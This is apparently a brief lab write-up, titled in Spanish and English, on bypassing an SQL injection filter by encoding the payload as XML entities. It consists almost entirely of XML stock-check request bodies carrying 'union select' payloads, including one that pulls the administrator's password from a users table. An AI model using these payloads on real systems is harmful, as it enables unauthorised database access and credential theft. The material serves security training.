Bypass de filtros con codificación XML en Inyección SQL
SQL injection with filter bypass via XML encoding



Mis à jour



Mis à jour
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>2</productId>
<storeId>2 union select 1</storeId>
</stockCheck><?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
<productId>2</productId>
<storeId><@dec_entities>2 union select 1</@dec_entities></storeId>
</stockCheck>
<@dec_entities>
2 union select password from users where username='administrator'
</@dec_entities>